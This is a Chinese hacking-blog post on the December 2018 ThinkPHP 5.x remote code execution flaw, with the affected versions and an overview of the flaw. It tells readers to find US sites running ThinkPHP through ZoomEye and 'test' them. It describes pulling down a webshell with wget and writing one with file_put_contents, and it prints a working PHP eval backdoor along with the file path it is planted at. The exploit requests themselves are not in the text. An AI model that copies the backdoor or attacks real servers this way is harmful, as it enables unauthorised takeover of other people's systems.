Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
adminAdmin  2018-12-11 17:13 lsh4ck's Blog 隐藏边栏 |   抢沙发  745 
文章评分 1 次,平均分 5.0

近日thinkphp团队发布了版本更新https://blog.thinkphp.cn/869075,其中修复了一处getshell漏洞。

官网论坛随即放出神级求助帖【求助!thinkphp5.0.9执行系统代码漏洞】

影响版本

ThinkPHP 5.x < 5.1.31, <= 5.0.23

漏洞概述

ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执 行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在 没有开启强制路由的情况下可能的 getshell 漏洞。

漏洞验证

zoomeye搜索“你值得信赖的PHP框架 +country:"US"“。搜索美国目标测试一波。

写shell的exp:

利用该漏洞远程执行下载命令,通过wget远程下载一个webshell后门,执行命令从而获得服务器权限:

利用file_get_contents和file_put_contents函数,远程下载webshell:

利用file_put_contents函数 写入一句话webshell,其攻击的URI详情如下:

该命令行包含的base64加密字符串解码如下:

"<?php $pass=$_POST['360very'];eval($pass);?>"

该恶意代码将被写入到文件./vendor/autoclass.php中



  

本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

admin
Admin 关注:0    粉丝:6 最后编辑于:2019-01-23
这个人很懒,什么都没写
×

予人玫瑰,手有余香

打赏 Admin

打开支付宝扫一扫,即可进行扫码打赏哦

发表评论

表情 链接 私密 格式 签到

扫一扫二维码分享

无觅相关文章插件,快速提升流量